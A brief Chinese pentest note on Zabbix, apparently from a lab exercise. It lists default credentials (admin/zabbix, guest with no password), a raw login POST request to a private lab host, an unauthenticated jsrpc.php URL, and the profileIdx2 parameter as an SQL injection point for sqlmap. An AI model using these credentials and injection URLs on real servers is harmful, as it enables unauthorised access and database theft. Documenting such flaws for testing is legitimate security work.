介绍:
zabbix是对服务器资源状态例如、内存空间、CPU、程序运行状态进行检测、设置预警值、短信设置等功能等一款开源工具。配置不当存在未授权,SQL注入漏洞
弱口令
name=admin&password=zabbix
name=guest&password=
POST /index.php HTTP/1.1
Host: 192.168.203.12:8080
Content-Length: 88
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.203.12:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.203.12:8080/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=6cmua046gkq78jai8ija37f7f5; tab=0; zbx_sessionid=37a3075c6ba46f1956c5d8d851c2e635
Connection: keep-alivesid=56c5d8d851c2e635&form_refresh=1&name=admin&password=zabbix&autologin=1&enter=Sign+in
未授权访问直接进入
http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1
SQL注入
http://192.168.203.12:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=1
profileIdx2参数存在注入点
可使用sqlmap跑,此处忽略
)
